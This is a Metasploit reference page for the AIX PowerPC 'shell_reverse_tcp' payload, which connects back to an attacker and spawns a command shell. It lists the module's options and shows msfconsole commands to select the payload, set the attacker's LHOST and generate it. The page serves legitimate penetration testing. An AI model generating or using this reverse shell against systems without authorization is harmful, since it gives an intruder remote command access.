Metasploit Penetration Testing Framework


OSVDB: CVE:
BID: MSB:
TEXT:


AIX Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell

Rank

  • Normal

Authors

  • ramon < ramon [at] risesecurity.org >

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/aix/ppc/shell_reverse_tcp
msf payload(shell_reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(shell_reverse_tcp) > generate

Module Options

AIX IBM AIX Version (default: 6.1.4)
LHOST The local address
LPORT The local port (default: 4444)
AutoRunScript A script to automatically on session creation.
InitialAutoRunScript An initial script to run on session created (before AutoRunScript)
ReverseConnectRetries The number of connection attempts to try before exiting the process
WORKSPACE Specify the workspace for this module
Copyright © 2003-2010 Rapid7 LLC